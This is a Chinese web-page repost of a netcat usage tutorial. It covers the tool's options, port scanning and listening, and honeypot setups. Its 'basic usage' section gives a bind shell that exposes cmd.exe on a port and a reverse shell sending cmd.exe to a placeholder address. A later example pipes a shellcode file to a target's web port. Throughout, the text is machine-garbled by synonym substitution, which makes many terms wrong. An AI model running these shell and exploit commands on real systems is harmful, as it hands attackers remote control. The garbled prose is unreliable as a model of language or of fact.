设为主页 | 加入收藏 | 繁體中文

经典好文:nc的说明及使用

  整理人:demonalex
  email:demonalex_at_dark2s.org
  参考材料:步伐原创者Hobbit与Chris Wysopal的说明文档、G-python、黑猫警长、Quack、zhoutree等各位高手的文章
  netcat被誉为网络宁静界的‘瑞士军刀',信赖没有什么人不了解它吧......
  一个简单而有用的工具,透过利用TCP或UDP协议的网络毗连去读写数据。它被计划成一个稳固的后门工具,
  可以或许直接由其它步伐和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,可以或许创建你需要的几
  乎所有类型的网络毗连,还有几个很有意思的内置功能(概况请看上面的利用方法)。
  在中国,它的WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一个是由‘红与黑'编译
  后的新‘稀释'版。‘稀释'版的主步伐只有10多KB(10多KB的NC是不克不及完成上面所说的第4、第5种利用方法,
  有此功能的原版NC好象要60KB:P),虽然"体积"小,但很完成许多事情。
  =====================================================================================================
  软件介绍:
  工具名:Netcat
  作者:Hobbit && Chris Wysopal
  网址:http://www.atstake.com/research/tools/network_utilities/
  类别:开放源码
  平台:Linux/BSD/Unix/Windows  
  WINDOWS下版本号:[v1.10 NT]
  =====================================================================================================
  参数介绍:
  'nc.exe -h'即可看到各参数的利用方法。
  根本格式:nc [-options] hostname port[s] [ports] ...
  nc -l -p port [options] [hostname] [port]
  -d 后台模式
  -e prog 步伐重定向,一旦毗连,就执行 [危险!!]
  -g gateway source-routing hop point[s], up to 8
  -G num source-routing pointer: 4, 8, 12, ...
  -h 资助信息
  -i secs 延时的间隔
  -l 监听模式,用于入站毗连
  -L 毗连关闭后,仍然连续监听
  -n 指定命字的IP地点,不克不及用hostname
  -o file 记录16进制的传输
  -p port 本地端口号
  -r 随机本地及长途端口
  -s addr 本地源地点
  -t 利用TELNET交互方法
  -u UDP模式
  -v 详细输入--用两个-v可得到更详细的内容
  -w secs timeout的时间
  -z 将输入输入关掉--用于扫描时
  端口的表现方法可写为M-N的范围格式。
  =====================================================================================================
  根本用法:
  大约有以下几种用法:
  1)毗连到REMOTE主机,例子:
  格式:nc -nvv 192.168.x.x 80
  讲解:连到192.168.x.x的TCP80端口
  2)监听LOCAL主机,例子:
  格式:nc -l -p 80
  讲解:监听本机的TCP80端口
  3)扫描长途主机,例子:
  格式:nc -nvv -w2 -z 192.168.x.x 80-445
  讲解:扫描192.168.x.x的TCP80到TCP445的所有端口
  4)REMOTE主机绑定SHELL,例子:
  格式:nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
  讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
  5)REMOTE主机绑定SHELL并反向毗连,例子:
  格式:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
  讲解:绑定REMOTE主机的CMDSHELL并反向毗连到192.168.x.x的TCP5354端口
  以上为最根本的几种用法(实在NC的用法还有许多,
  当配合管道下令"|"与重定向下令"<"、">"等等下令功能更强大......)。
  =====================================================================================================
  高级用法:
  6)作攻击步伐用,例子:
  格式1:type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80
  格式2:nc -nvv 192.168.x.x 80 < c:\exploit.txt
  讲解:毗连到192.168.x.x的80端口,并在其管道中发送'c:\exploit.txt'的内容(两种格式确有相同的结果,
  真是有异曲同工之妙:P)
  附:'c:\exploit.txt'为shellcode等
  7)作蜜罐用[1],例子:
  格式:nc -L -p 80
  讲解:利用'-L'(细致L是大写)可以不绝地监听某一个端口,直到ctrl+c为止
  8)作蜜罐用[2],例子:
  格式:nc -L -p 80 > c:\log.txt
  讲解:利用'-L'可以不绝地监听某一个端口,直到ctrl+c为止,同时把结果输入到'c:\log.txt'中,如果把‘>'
  改为‘>>'即可以追加日志
  附:'c:\log.txt'为日志等
  9)作蜜罐用[3],例子:
  格式1:nc -L -p 80 < c:\honeypot.txt
  格式2:type.exe c:\honeypot.txt|nc -L -p 80
  讲解:利用'-L'可以不绝地监听某一个端口,直到ctrl+c为止,并把'c:\honeypot.txt'的内容‘送'入其
  管道中
  附:'c:\honeypot.txt'为诱骗数据等
  =====================================================================================================
  自己水平无限,希望各位高手多多指教,接待写信到demonalex@dark2s.org与偶讨论,谢谢:)
 


    文章作者: 福州军威计算机技术有限公司
    军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
    版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:
评论加载中...
内容:
评论者: 验证码: